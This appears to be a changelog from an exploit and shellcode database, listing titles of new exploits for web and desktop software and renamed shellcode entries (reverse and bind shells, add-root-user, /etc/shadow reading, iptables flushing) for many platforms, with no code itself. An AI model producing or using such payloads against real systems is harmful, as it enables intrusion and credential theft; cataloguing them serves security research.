DB: 2018-01-16

39 changes to exploits/shellcodes

OBS studio 20.1.3 - Local Buffer Overflow

Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation
Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation
SysGauge Server 3.6.18 - Buffer Overflow
Disk Pulse Enterprise 10.1.18 - Buffer Overflow
Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution
ImgHosting 1.5 - Cross-Site Scripting
Domains & Hostings Manager PRO 3.0 - Authentication Bypass
PerfexCRM 1.9.7 - Arbitrary File Upload
RISE 1.9 - 'search' SQL Injection
Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
Adminer 4.3.1 - Server-Side Request Forgery
Oracle PeopleSoft 8.5x - Remote Code Execution
ILIAS < 5.2.4 - Cross-Site Scripting
Flash Operator Panel 2.31.03 - Command Execution

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection

BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)
BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)

BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)
BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)
BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)
BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)
BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)

BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)
BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)

BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes)
BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)

FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)
FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)

FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)

FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes)
FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)

FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)

Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)
Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)

Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode
Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode
Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)
Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)

Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)
Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)
Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)
Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)
Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)
Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)

Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)
Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)

Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)
Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)
Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)

Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)
Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)
Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)

Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)
Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)

Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)

Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)
Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)

Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)

OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)
OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)

Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)
Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)

Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)
Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)
Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)
Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode

Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)

Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)
FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)

Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode
Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode

Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)
Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)

Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)
Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)
Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)
Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)
Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)

BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)
BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)
Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode
Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode
Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)
FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)
FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)

Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)
Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)

Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)

Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)

Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)
Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)

Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode
Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)
Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)

Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)
Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)
Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)

Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)
Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)

Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)
Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)

OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)
OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)

Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)
Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)

Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)

Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)
Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)

Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)
Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)

Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)
Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)
Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)
Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)

Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)
Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)
Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)
Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)

Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)
Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
OpenBSD/x86 - reboot() Shellcode (15 bytes)

Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)

Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)
Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)
Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)

Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)

FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)

FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)
FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)

IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)
IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)

Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)
Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)

Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)
Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)

